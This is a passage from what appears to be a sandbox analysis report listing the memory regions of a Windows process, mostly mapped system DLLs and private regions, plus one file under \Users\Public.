0x740a1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" Region: id = 1674 start_va = 0x74320000 end_va = 0x74340fff entry_point = 0x7432145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" Region: id = 1675 start_va = 0x74370000 end_va = 0x74376fff entry_point = 0x743710c0 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" Region: id = 1676 start_va = 0x74380000 end_va = 0x743a4fff entry_point = 0x74382b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" Region: id = 1677 start_va = 0x74560000 end_va = 0x7456efff entry_point = 0x7456125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" Region: id = 1678 start_va = 0x74580000 end_va = 0x74588fff entry_point = 0x745815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" Region: id = 1679 start_va = 0x746b0000 end_va = 0x747aafff entry_point = 0x746c17e1 region_type = mapped_file name = "WindowsCodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" Region: id = 1680 start_va = 0x747b0000 end_va = 0x747defff entry_point = 0x747b1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" Region: id = 1681 start_va = 0x747e0000 end_va = 0x747f2fff entry_point = 0x747e1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" Region: id = 1682 start_va = 0x74800000 end_va = 0x74838fff entry_point = 0x7480e2de region_type = mapped_file name = "MMDevAPI.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" Region: id = 1683 start_va = 0x74840000 end_va = 0x74848fff entry_point = 0x74841120 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" Region: id = 1684 start_va = 0x74850000 end_va = 0x74887fff entry_point = 0x7485138b region_type = mapped_file name = "SndVolSSO.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" Region: id = 1685 start_va = 0x74890000 end_va = 0x748befff entry_point = 0x7489c7a2 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" Region: id = 1686 start_va = 0x748c0000 end_va = 0x74971fff entry_point = 0x749116fd region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" Region: id = 1687 start_va = 0x74980000 end_va = 0x74b0ffff entry_point = 0x74a1d026 region_type = mapped_file name = "GdiPlus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" Region: id = 1688 start_va = 0x74b10000 end_va = 0x74b4ffff entry_point = 0x74b1a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 1689 start_va = 0x74b50000 end_va = 0x74c44fff entry_point = 0x74b60d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 1690 start_va = 0x74c50000 end_va = 0x74c61fff entry_point = 0x74c54795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" Region: id = 1691 start_va = 0x74c70000 end_va = 0x74c8dfff entry_point = 0x74c71369 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" Region: id = 1692 start_va = 0x74c90000 end_va = 0x74e2dfff entry_point = 0x74cbe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" Region: id = 1693 start_va = 0x74e30000 end_va = 0x74f27fff entry_point = 0x74e31689 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" Region: id = 1694 start_va = 0x74f30000 end_va = 0x750e6fff entry_point = 0x74f3ae9d region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" Region: id = 1695 start_va = 0x75360000 end_va = 0x75376fff entry_point = 0x75361c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" Region: id = 1696 start_va = 0x75520000 end_va = 0x7555afff entry_point = 0x7552128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 1697 start_va = 0x75780000 end_va = 0x75795fff entry_point = 0x75782dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 1698 start_va = 0x75b50000 end_va = 0x75b68fff entry_point = 0x75b51319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" Region: id = 1699 start_va = 0x75bc0000 end_va = 0x75bc7fff entry_point = 0x75bc10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 1700 start_va = 0x75be0000 end_va = 0x75bfafff entry_point = 0x75be93b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 1701 start_va = 0x75c00000 end_va = 0x75c0bfff entry_point = 0x75c010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 1702 start_va = 0x75c70000 end_va = 0x75c98fff entry_point = 0x75c76b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" Region: id = 1703 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca1235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 1704 start_va = 0x75cb0000 end_va = 0x75cbafff entry_point = 0x75cb1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 1705 start_va = 0x75d20000 end_va = 0x75d2bfff entry_point = 0x75d2238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 1706 start_va = 0x75d30000 end_va = 0x75d41fff entry_point = 0x75d31441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" Region: id = 1707 start_va = 0x75d50000 end_va = 0x75e6cfff entry_point = 0x75d5158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 1708 start_va = 0x75f30000 end_va = 0x75f79fff entry_point = 0x75f37de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1709 start_va = 0x75f80000 end_va = 0x75fa6fff entry_point = 0x75f858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 1710 start_va = 0x75fb0000 end_va = 0x75fcefff entry_point = 0x75fb1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 1711 start_va = 0x76010000 end_va = 0x7605dfff entry_point = 0x76019c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 1712 start_va = 0x76060000 end_va = 0x760a4fff entry_point = 0x760611e1 region_type = mapped_file name = "Wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" Region: id = 1713 start_va = 0x76110000 end_va = 0x761b0fff entry_point = 0x76142433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 1714 start_va = 0x761c0000 end_va = 0x7626bfff entry_point = 0x761ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1715 start_va = 0x76270000 end_va = 0x76338fff entry_point = 0x7628d711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 1716 start_va = 0x76340000 end_va = 0x764dcfff entry_point = 0x763417e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" Region: id = 1717 start_va = 0x764e0000 end_va = 0x77129fff entry_point = 0x76561601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 1718 start_va = 0x77130000 end_va = 0x771cffff entry_point = 0x771449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 1719 start_va = 0x771d0000 end_va = 0x772c4fff entry_point = 0x771d1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" Region: id = 1720 start_va = 0x77380000 end_va = 0x7757afff entry_point = 0x773822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" Region: id = 1721 start_va = 0x77580000 end_va = 0x7761cfff entry_point = 0x775b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 1722 start_va = 0x77620000 end_va = 0x7777bfff entry_point = 0x7766ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 1723 start_va = 0x77780000 end_va = 0x77853fff entry_point = 0x777cbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1724 start_va = 0x77860000 end_va = 0x778b6fff entry_point = 0x77879ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 1725 start_va = 0x778c0000 end_va = 0x779f5fff entry_point = 0x778c1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" Region: id = 1726 start_va = 0x77a00000 end_va = 0x77a8efff entry_point = 0x77a03fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 1727 start_va = 0x77a90000 end_va = 0x77b5bfff entry_point = 0x77a9168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 1728 start_va = 0x77b60000 end_va = 0x77c9bfff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1729 start_va = 0x77cb0000 end_va = 0x77cb4fff entry_point = 0x77cb1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" Region: id = 1730 start_va = 0x77cc0000 end_va = 0x77cc9fff entry_point = 0x77cc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 1731 start_va = 0x77ce0000 end_va = 0x77cf8fff entry_point = 0x77ce4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 1732 start_va = 0x77d00000 end_va = 0x77d82fff entry_point = 0x77d023d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 1733 start_va = 0x77da0000 end_va = 0x77da0fff entry_point = 0x77da0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1734 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1735 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1736 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1737 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1738 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1739 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1740 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1741 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1742 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1743 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1744 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1745 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1746 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1747 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1748 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1749 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1750 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1751 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1752 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1753 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1754 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1755 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1756 start_va = 0x3420000 end_va = 0x345ffff entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 1757 start_va = 0x4be0000 end_va = 0x4c54fff entry_point = 0x4bf48d4 region_type = mapped_file name = "N3Eg4.51N3E" filename = "\\Users\\Public\\N3Eg\\N3Eg4.51N3E" Region: id = 1758 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1759 start_va = 0x5210000 end_va = 0x530ffff entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 1761 start_va = 0x5310000 end_va = 0x534ffff entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 1762 start_va = 0x5350000 end_va = 0x55e2fff entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 1763 start_va = 0x55f0000 end_va = 0x57effff entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 1764 start_va = 0x57f0000 end_va = 0x59aefff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1765 start_va = 0x59b0000 end_va = 0x5b6cfff entry_point = 0x0 region_type = private name = "private_0x00000000059b0000" filename = "" Region: id = 1766 start_va = 0x73d60000 end_va = 0x73e16fff entry_point = 0x73d61730 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" Region: id = 1767 start_va = 0x74440000 end_va = 0x74479fff entry_point = 0x744434b9 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" Region: id = 1768 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1769 start_va = 0x3230000 end_va = 0x3231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003230000" filename = "" Region: id = 1770 start_va = 0x3240000 end_va = 0x3241fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 1771 start_va = 0x37f0000 end_va = 0x382ffff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 1772 start_va = 0x5a90000 end_va = 0x5acffff entry_point = 0x0 region_type = private name = "private_0x0000000005a90000" filename = "" Region: id = 1773 start_va = 0x5ad0000 end_va = 0x5c90fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1774 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1775 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1776 start_va = 0x57f0000 end_va = 0x59b2fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1777 start_va = 0x3290000 end_va = 0x3291fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003290000" filename = "" Region: id = 1778 start_va = 0x74690000 end_va = 0x7469cfff entry_point = 0x746911e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" Region: id = 1779 start_va = 0x5ad0000 end_va = 0x5c94fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1780 start_va = 0x57f0000 end_va = 0x59b6fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1781 start_va = 0x5ad0000 end_va = 0x5c98fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1782 start_va = 0x57f0000 end_va = 0x59bafff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1783 start_va = 0x5ad0000 end_va = 0x5c9cfff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1784 start_va = 0x57f0000 end_va = 0x59befff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1785 start_va = 0x5ad0000 end_va = 0x5ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1786 start_va = 0x57f0000 end_va = 0x59c2fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1787 start_va = 0x5ad0000 end_va = 0x5ca4fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1788 start_va = 0x57f0000 end_va = 0x59c6fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1789 start_va = 0x5ad0000 end_va = 0x5ca8fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1790 start_va = 0x57f0000 end_va = 0x59cafff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1791 start_va = 0x5ad0000 end_va = 0x5cacfff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1792 start_va = 0x57f0000 end_va = 0x59cefff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1793 start_va = 0x5ad0000 end_va = 0x5cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1794 start_va = 0x57f0000 end_va = 0x59d2fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1795 start_va = 0x5ad0000 end_va = 0x5cb4fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1796 start_va = 0x57f0000 end_va = 0x59d6fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1797 start_va = 0x5ad0000 end_va = 0x5cb8fff entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1798 start_va = 0x57f0000 end_va = 0x59dafff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1799 start_va = 0x32a0000 end_va = 0x32a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 1800 start_va = 0x73c90000 end_va = 0x73ce0fff entry_point = 0x73cb988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" Region: id = 1801 start_va = 0x73cf0000 end_va = 0x73d53fff entry_point = 0x73d0e4c7 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" Region: id = 1802 start_va = 0x32b0000 end_va = 0x32b3fff entry_point = 0x32b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" Region: id = 1803 start_va = 0x5c10000 end_va = 0x5c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c10000" filename = "" Region: id = 1804 start_va = 0x74010000 end_va = 0x74056fff entry_point = 0x740289f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" Region: id = 1805 start_va = 0x5c20000 end_va = 0x5e0cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1806 start_va = 0x57f0000 end_va = 0x59defff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1807 start_va = 0x5c20000 end_va = 0x5e10fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1808 start_va = 0x57f0000 end_va = 0x59e2fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1809 start_va = 0x5c20000 end_va = 0x5e14fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1867 start_va = 0x57f0000 end_va = 0x59e6fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1868 start_va = 0x5c20000 end_va = 0x5e18fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1869 start_va = 0x57f0000 end_va = 0x59eafff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1870 start_va = 0x5c20000 end_va = 0x5e1cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1871 start_va = 0x57f0000 end_va = 0x59eefff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1872 start_va = 0x5c20000 end_va = 0x5e20fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1873 start_va = 0x57f0000 end_va = 0x59f2fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1874 start_va = 0x5c20000 end_va = 0x5e24fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1881 start_va = 0x57f0000 end_va = 0x59f6fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1882 start_va = 0x4cb0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 1883 start_va = 0x5c20000 end_va = 0x5e28fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1884 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 1885 start_va = 0x57f0000 end_va = 0x59fafff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1886 start_va = 0x5c20000 end_va = 0x5e2cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1887 start_va = 0x57f0000 end_va = 0x59fefff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1888 start_va = 0x5ae0000 end_va = 0x5b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005ae0000" filename = "" Region: id = 1889 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 1895 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1896 start_va = 0x57f0000 end_va = 0x5a02fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1897 start_va = 0x5c20000 end_va = 0x5e30fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1898 start_va = 0x5c20000 end_va = 0x5e34fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1899 start_va = 0x73a50000 end_va = 0x73ab3fff entry_point = 0x73a780f6 region_type = mapped_file name = "DXP.dll" filename = "\\Windows\\System32\\DXP.dll" Region: id = 1900 start_va = 0x57f0000 end_va = 0x5a06fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1901 start_va = 0x5c20000 end_va = 0x5e38fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1902 start_va = 0x74430000 end_va = 0x7443ffff entry_point = 0x744339b3 region_type = mapped_file name = "Syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" Region: id = 1903 start_va = 0x5a40000 end_va = 0x5a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 1904 start_va = 0x3310000 end_va = 0x3311fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003310000" filename = "" Region: id = 1905 start_va = 0x73a40000 end_va = 0x73a47fff entry_point = 0x73a41220 region_type = mapped_file name = "ehSSO.dll" filename = "\\Windows\\ehome\\ehSSO.dll" Region: id = 1906 start_va = 0x57f0000 end_va = 0x5a0afff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1907 start_va = 0x72c80000 end_va = 0x72c86fff entry_point = 0x72c8128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 1908 start_va = 0x72c90000 end_va = 0x72cabfff entry_point = 0x72c9a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 1909 start_va = 0x737d0000 end_va = 0x73a34fff entry_point = 0x737dbaff region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" Region: id = 1910 start_va = 0x74130000 end_va = 0x7413ffff entry_point = 0x741338c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" Region: id = 1911 start_va = 0x77ca0000 end_va = 0x77ca5fff entry_point = 0x77ca1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 1912 start_va = 0x3370000 end_va = 0x337ffff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 1913 start_va = 0x5fb0000 end_va = 0x5fbffff entry_point = 0x0 region_type = private name = "private_0x0000000005fb0000" filename = "" Region: id = 1914 start_va = 0x5c60000 end_va = 0x5c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c60000" filename = "" Region: id = 1915 start_va = 0x5ca0000 end_va = 0x5ebcfff entry_point = 0x0 region_type = private name = "private_0x0000000005ca0000" filename = "" Region: id = 1916 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 1917 start_va = 0x57f0000 end_va = 0x5a0efff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1918 start_va = 0x5c20000 end_va = 0x5e40fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1919 start_va = 0x737a0000 end_va = 0x737bcfff entry_point = 0x737b1864 region_type = mapped_file name = "WPDShServiceObj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" Region: id = 1920 start_va = 0x73770000 end_va = 0x7379afff entry_point = 0x7377171f region_type = mapped_file name = "PortableDeviceTypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" Region: id = 1921 start_va = 0x736e0000 end_va = 0x73768fff entry_point = 0x736e55c7 region_type = mapped_file name = "PortableDeviceApi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" Region: id = 1922 start_va = 0x57f0000 end_va = 0x5a12fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1923 start_va = 0x5c20000 end_va = 0x5e44fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1924 start_va = 0x736d0000 end_va = 0x736ddfff entry_point = 0x736d1336 region_type = mapped_file name = "AltTab.dll" filename = "\\Windows\\System32\\AltTab.dll" Region: id = 1925 start_va = 0x5b20000 end_va = 0x5b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005b20000" filename = "" Region: id = 1926 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 1927 start_va = 0x57f0000 end_va = 0x5a16fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1928 start_va = 0x5c20000 end_va = 0x5e48fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1929 start_va = 0x73500000 end_va = 0x73516fff entry_point = 0x73504ba3 region_type = mapped_file name = "QUTIL.DLL" filename = "\\Windows\\System32\\QUTIL.DLL" Region: id = 1930 start_va = 0x73520000 end_va = 0x736cdfff entry_point = 0x735215a7 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" Region: id = 1931 start_va = 0x75940000 end_va = 0x75981fff entry_point = 0x75941360 region_type = mapped_file name = "wevtapi.dll" filename = 